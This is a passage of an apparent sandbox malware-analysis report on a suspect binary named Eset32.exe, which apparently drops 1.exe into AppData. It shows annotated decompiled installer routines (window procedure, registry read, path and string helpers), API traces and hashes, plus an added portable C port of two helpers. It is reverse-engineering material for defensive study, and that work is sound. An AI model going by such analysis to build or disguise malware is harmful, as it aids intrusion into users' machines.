                                                          					_t18 =  *_t21;
                                                          					if(_t18 == 0 || _t18 == 0x5c) {
                                                          						goto L1;
                                                          					} else {
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          				L1:
                                                          				return 0;
                                                          			}









                                                          APIs
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,76DDFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,76DDFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                          • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,76DDFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76DDFA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 3248276644-823278215
                                                          • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                          • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                          • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                          • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                          				int _t15;
                                                          				long _t16;
                                                          
                                                          				// Subclassed window procedure: _a4 = hWnd, _a8 = uMsg, _a12 = wParam, _a16 = lParam.
                                                          				// The original window procedure is kept at 0x42a884; anything not handled here is
                                                          				// forwarded to it through CallWindowProcA.
                                                          				_t15 = _a8;
                                                          				if(_t15 != 0x102) { // 0x102 = WM_CHAR
                                                          					if(_t15 != 0x200) { // 0x200 = WM_MOUSEMOVE
                                                          						_t16 = _a16;
                                                          						L7:
                                                          						// 0x419 = WM_USER+0x19. The last value is cached at 0x42a87c so E00404B4E
                                                          						// is only invoked when the value actually changes.
                                                          						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
                                                          							_push(_t16);
                                                          							_push(6);
                                                          							 *0x42a87c = _t16;
                                                          							E00404B4E();
                                                          						}
                                                          						L11:
                                                          						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
                                                          					}
                                                          					// WM_MOUSEMOVE on a hidden window is forwarded unchanged.
                                                          					if(IsWindowVisible(_a4) == 0) {
                                                          						L10:
                                                          						_t16 = _a16;
                                                          						goto L11;
                                                          					}
                                                          					// Visible window: the result of E00404ACE(hWnd, 1) (body not shown here) is
                                                          					// re-dispatched as a synthetic 0x419 message via the L7 path.
                                                          					_t16 = E00404ACE(_a4, 1);
                                                          					_t15 = 0x419;
                                                          					goto L7;
                                                          				}
                                                          				// WM_CHAR: only the space key (wParam 0x20) is intercepted. E004041C7 sends
                                                          				// message 0x413 (WM_USER+0x13, see the SendMessageA subcall below) and the
                                                          				// keystroke is swallowed (return 0) rather than forwarded.
                                                          				if(_a12 != 0x20) {
                                                          					goto L10;
                                                          				}
                                                          				E004041C7(0x413);
                                                          				return 0;
                                                          			}





                                                          Instruction address range: 0x00405196 to 0x00405212

                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004051C1
                                                          • CallWindowProcA.USER32 ref: 00405212
                                                            • Part of subcall function 004041C7: SendMessageA.USER32 ref: 004041D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                          • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                          • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                          • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			// Reads a registry string value into a fixed 1024-byte caller-supplied buffer.
                                                          			// _a4 = root key, _a8 = subkey (the slot is reused below as the output value-type),
                                                          			// _a12 = value name, _a16 = output buffer, _a20 = flag selecting the registry view
                                                          			// (the slot is reused below as the opened HKEY). Inferred from the API trace, which
                                                          			// shows 80000002 (HKEY_LOCAL_MACHINE) and Software\Microsoft\Windows\CurrentVersion
                                                          			// on the caller's stack.
                                                          			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                          				int _v8;
                                                          				long _t21;
                                                          				long _t24;
                                                          				char* _t30;
                                                          
                                                          				asm("sbb eax, eax"); // all-ones / zero mask feeding the access-mask expression below
                                                          				_v8 = 0x400; // cbData: the buffer is 0x400 bytes
                                                          				// Access mask: 0x20019 = KEY_READ, optionally | 0x100 = KEY_WOW64_64KEY.
                                                          				// E00405F7D opens the key and stores the handle in _a20.
                                                          				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                          				_t30 = _a16;
                                                          				if(_t21 != 0) {
                                                          					L4:
                                                          					// Open failed, query failed, or the value is not a string: hand back "".
                                                          					 *_t30 =  *_t30 & 0x00000000;
                                                          				} else {
                                                          					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                          					_t21 = RegCloseKey(_a20);
                                                          					// Force a NUL at the last buffer byte: RegQueryValueEx does not guarantee
                                                          					// that stored string data is terminated.
                                                          					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                          					// Only REG_SZ (1) and REG_EXPAND_SZ (2) are accepted.
                                                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                          						goto L4;
                                                          					}
                                                          				}
                                                          				return _t21;
                                                          			}







                                                          Instruction address range: 0x00405fec to 0x00406052

                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,C:\Users\user\AppData\Roaming\1.exe,0042A070,?,?,?,00000002,C:\Users\user\AppData\Roaming\1.exe,?,00406293,80000002), ref: 00406024
                                                          • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Roaming\1.exe,C:\Users\user\AppData\Roaming\1.exe,C:\Users\user\AppData\Roaming\1.exe,?,0042A070), ref: 0040602F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: C:\Users\user\AppData\Roaming\1.exe
                                                          • API String ID: 3356406503-4019330430
                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			// Tears down the singly linked list of loaded DLLs whose head pointer lives at
                                                          			// 0x429854. Each node: +0 = next node, +8 = HMODULE; the nodes themselves were
                                                          			// allocated with GlobalAlloc.
                                                          			E00403875() {
                                                          				void* _t2;
                                                          				void* _t3;
                                                          				void* _t6;
                                                          				void* _t8;
                                                          
                                                          				_t8 =  *0x429854; // 0x0
                                                          				_t3 = E0040385A(_t2, 0);
                                                          				if(_t8 != 0) {
                                                          					do {
                                                          						_t6 = _t8;
                                                          						_t8 =  *_t8; // read the next pointer before the node is freed
                                                          						FreeLibrary( *(_t6 + 8));
                                                          						_t3 = GlobalFree(_t6);
                                                          					} while (_t8 != 0);
                                                          				}
                                                          				 *0x429854 =  *0x429854 & 0x00000000; // list head = NULL
                                                          				return _t3;
                                                          			}







                                                          Instruction address range: 0x00403876 to 0x004038a9

                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,76DDFA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                          • GlobalFree.KERNEL32 ref: 00403896
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-823278215
                                                          • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                          • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                          • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                          • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			// Splits a path in place at its last backslash: the backslash is overwritten with
                                                          			// NUL, so _a4 is left holding the directory part, and a pointer to the file-name
                                                          			// part is returned. If no backslash is found the scan stops at the first byte,
                                                          			// that byte is overwritten instead, and _a4 + 1 is returned.
                                                          			E00405AD6(char* _a4) {
                                                          				char* _t3;
                                                          				char* _t5;
                                                          
                                                          				_t5 = _a4;
                                                          				_t3 =  &(_t5[lstrlenA(_t5)]); // start at the terminating NUL
                                                          				while( *_t3 != 0x5c) { // 0x5c = '\'
                                                          					_t3 = CharPrevA(_t5, _t3); // DBCS-aware step backwards, never before _t5
                                                          					if(_t3 > _t5) {
                                                          						continue;
                                                          					}
                                                          					break; // reached the start of the string
                                                          				}
                                                          				 *_t3 =  *_t3 & 0x00000000;
                                                          				return  &(_t3[1]);
                                                          			}





                                                          Instruction address range: 0x00405ad7 to 0x00405af9

                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Eset32.exe,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00405ADC
                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Eset32.exe,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00405AEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-1246513382
                                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			// Case-insensitive substring search with strstr semantics: returns a pointer into
                                                          			// the haystack _a4 at the first match of the needle _a8, or 0. The haystack is
                                                          			// written to during the scan: a NUL is placed at haystack + strlen(needle) so that
                                                          			// lstrcmpiA compares only a needle-length window, then the byte is put back. The
                                                          			// haystack must therefore be writable. lstrlenA is re-run on every step, so the
                                                          			// scan is quadratic in the haystack length.
                                                          			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                          				int _v8;
                                                          				int _t12;
                                                          				int _t14;
                                                          				int _t15;
                                                          				CHAR* _t17;
                                                          				CHAR* _t27;
                                                          
                                                          				_t12 = lstrlenA(_a8);
                                                          				_t27 = _a4;
                                                          				_v8 = _t12; // needle length
                                                          				while(lstrlenA(_t27) >= _v8) { // stop once the remaining haystack is shorter than the needle
                                                          					_t14 = _v8;
                                                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000; // temporarily terminate the window
                                                          					_t15 = lstrcmpiA(_t27, _a8);
                                                          					// Restore the byte saved before the NUL write. The decompiler renders the
                                                          					// saved register as a re-read of the same cell, which as written would be a
                                                          					// no-op; the intent is to put the original byte back.
                                                          					_t27[_v8] =  *(_t14 + _t27);
                                                          					if(_t15 == 0) {
                                                          						_t17 = _t27; // match
                                                          					} else {
                                                          						_t27 = CharNextA(_t27); // DBCS-aware advance
                                                          						continue;
                                                          					}
                                                          					L5:
                                                          					return _t17;
                                                          				}
                                                          				_t17 = 0; // no match
                                                          				goto L5;
                                                          			}









                                                          Instruction address range: 0x00405c05 to 0x00405c47

                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                                                          • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                          • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                          • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                          • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
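The two string helpers decompiled above, E00405AD6 (split a path at its last backslash) and E00405BF5 (case-insensitive substring search), are easier to reason about as portable C. The block below is an added example written for this page; it is not code from the sample, from the report, or from any project the sample may be built with. It assumes single-byte characters, so CharPrevA / CharNextA become a plain step of one byte and the DBCS handling of the originals is not reproduced, and it models lstrcmpiA with ASCII-only case folding. The function names trim_slash_to_end, strstri_inplace and strcasecmp_ascii are the author's own. The sample inputs are constructed: the path is the dropped-file path that appears in this report's API trace, and the "[Rename]" needle is the string visible in the E00405BF5 trace.

```c
/* Added example, not code from Eset32.exe or the Joe Sandbox report.
 * Portable ports of E00405AD6 and E00405BF5 from the decompilation above.
 * Assumptions: single-byte characters (CharPrevA/CharNextA = p - 1 / p + 1),
 * ASCII-only case folding in place of lstrcmpiA. Names are the author's own. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Stand-in for lstrcmpiA: compare two NUL-terminated strings, folding ASCII case. */
static int strcasecmp_ascii(const char *a, const char *b)
{
    for (;; a++, b++) {
        int ca = tolower((unsigned char)*a);
        int cb = tolower((unsigned char)*b);
        if (ca != cb || ca == '\0')
            return ca - cb;
    }
}

/* Port of E00405AD6: split `path` in place at its last backslash.
 * The backslash becomes NUL, so `path` is left holding the directory part, and a
 * pointer to the file-name part is returned. As in the original, when there is no
 * backslash the scan stops at the first byte, overwrites it, and returns path + 1,
 * so the caller gets the name minus its first character and an empty directory. */
static char *trim_slash_to_end(char *path)
{
    char *p = path + strlen(path);        /* start at the terminating NUL */
    while (*p != '\\') {
        p = (p > path) ? p - 1 : path;    /* CharPrevA never steps before `path` */
        if (p <= path)
            break;                        /* reached the start without a backslash */
    }
    *p = '\0';
    return p + 1;
}

/* Port of E00405BF5: case-insensitive strstr. The original temporarily writes a NUL
 * into the haystack at needle-length offset so a whole-string compare only sees a
 * fixed window, then restores the byte. That in-place write is kept here, so `hay`
 * must be writable memory. Returns a pointer to the match, or NULL. */
static char *strstri_inplace(char *hay, const char *needle)
{
    size_t n = strlen(needle);
    while (strlen(hay) >= n) {            /* remaining haystack still long enough */
        char saved = hay[n];
        hay[n] = '\0';                    /* terminate the window */
        int r = strcasecmp_ascii(hay, needle);
        hay[n] = saved;                   /* restore the original byte */
        if (r == 0)
            return hay;
        hay++;                            /* CharNextA */
    }
    return NULL;
}

int main(void)
{
    /* Constructed input: the dropped-file path seen in the report's API trace. */
    char path[] = "C:\\Users\\user\\AppData\\Roaming\\1.exe";
    const char *name = trim_slash_to_end(path);
    printf("dir=\"%s\" name=\"%s\"\n", path, name);

    /* Constructed input: the same bare name, showing the no-backslash behaviour. */
    char bare[] = "1.exe";
    const char *odd = trim_slash_to_end(bare);
    printf("dir=\"%s\" name=\"%s\"\n", bare, odd);

    /* Constructed haystack around the "[Rename]" needle from the E00405BF5 trace. */
    char line[] = "section [Rename] follows";
    char *hit = strstri_inplace(line, "[rename]");
    printf("match at offset %ld, haystack intact: %s\n",
           hit ? (long)(hit - line) : -1L, line);
    return 0;
}
```

The first call splits the path into "C:\Users\user\AppData\Roaming" and "1.exe"; the second shows the quirk of the original when no backslash is present (the returned name is ".exe" and the buffer is emptied). The search returns offset 8 for "[rename]" against "[Rename]" and leaves the haystack byte-for-byte as it was, which is the property the temporary NUL write depends on.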

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8eO
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1371eb4053c4739ef91059e6c85759a438b6da354d79d3960367f5c947019f4c
                                                          • Instruction ID: 1aeab6fbff3b21900002e107c25e84559228dd7b10cb6c21bacf7af09efc41b3
                                                          • Opcode Fuzzy Hash: 1371eb4053c4739ef91059e6c85759a438b6da354d79d3960367f5c947019f4c
                                                          • Instruction Fuzzy Hash: B9319F3094E7C54FD317A77488212507FB1AF83324B1945EBD099CB6F3EA6D698AC322
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4396272cf8528402f0803bfec0c7a5381fa9131bdf5e0634315c0cf310e6c5c5
                                                          • Instruction ID: aff7a30da5b8f5c85c653039ef260bf913455b97c1086f5475538a1201f3d996
                                                          • Opcode Fuzzy Hash: 4396272cf8528402f0803bfec0c7a5381fa9131bdf5e0634315c0cf310e6c5c5
                                                          • Instruction Fuzzy Hash: 45212731E0C8160BE764EF1898526B4B792EF58750B10427AD11DC73F2DD68BD8247C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 825ee0a7557bbd3b6711095524ee187a2ddebce9e7bec495571dff5dcd04988d
                                                          • Instruction ID: 6ba0868d88a34017383e84511709a2023a43a851fb85c4058b59ec5a80117bc3
                                                          • Opcode Fuzzy Hash: 825ee0a7557bbd3b6711095524ee187a2ddebce9e7bec495571dff5dcd04988d
                                                          • Instruction Fuzzy Hash: 362128A240E7C15FE30787348C621927FB0AF13215B1E85EBD1D5CB5F3D5186A5AC762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d2c7f833bfc55993c8caa804e5c5ea8b926c3894c40a461e374fd3d726be9e0
                                                          • Instruction ID: 864d078f21cba671c4101dcac408ba0836d152b3ec260b786159769ffb792516
                                                          • Opcode Fuzzy Hash: 3d2c7f833bfc55993c8caa804e5c5ea8b926c3894c40a461e374fd3d726be9e0
                                                          • Instruction Fuzzy Hash: 3C11F331E0C9194BE768FF2888526A5B391EF88750B1041BED41EC72E2DE78AD8287C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1cd08ad2a3bdb972f457cc3ae5d64a474d7c7020ed7d5d2f7f2de96133dcc77d
                                                          • Instruction ID: 42554f1825f49e1673176a4da51828edd6f327871c075284d9f446faa4e0c686
                                                          • Opcode Fuzzy Hash: 1cd08ad2a3bdb972f457cc3ae5d64a474d7c7020ed7d5d2f7f2de96133dcc77d
                                                          • Instruction Fuzzy Hash: 4701D47260C40D2B972CA8788C5A577B39ED3C6320B12933EE597D37E6EDA0A91301C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2281629fabbd9fc32d82594080871a40c8e81f4854022eca178d17179a37046f
                                                          • Instruction ID: 7278f091d31dd6c76394cdccf4f2fa63ff4f86e52f74b2d9267f6a5df484b4b7
                                                          • Opcode Fuzzy Hash: 2281629fabbd9fc32d82594080871a40c8e81f4854022eca178d17179a37046f
                                                          • Instruction Fuzzy Hash: 7501F27220C1081FA31CE869AC4B8B2738DE382330761523EE597C26B6FC65BC5342C4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a501de247bda79f74b5c46c33f95abe0990ab7bb000fc3150a344b4090107567
                                                          • Instruction ID: e47b0592a93d9b880b91d28da5dc4e43a556b1c6918f4cfbe377e33ac83d8796
                                                          • Opcode Fuzzy Hash: a501de247bda79f74b5c46c33f95abe0990ab7bb000fc3150a344b4090107567
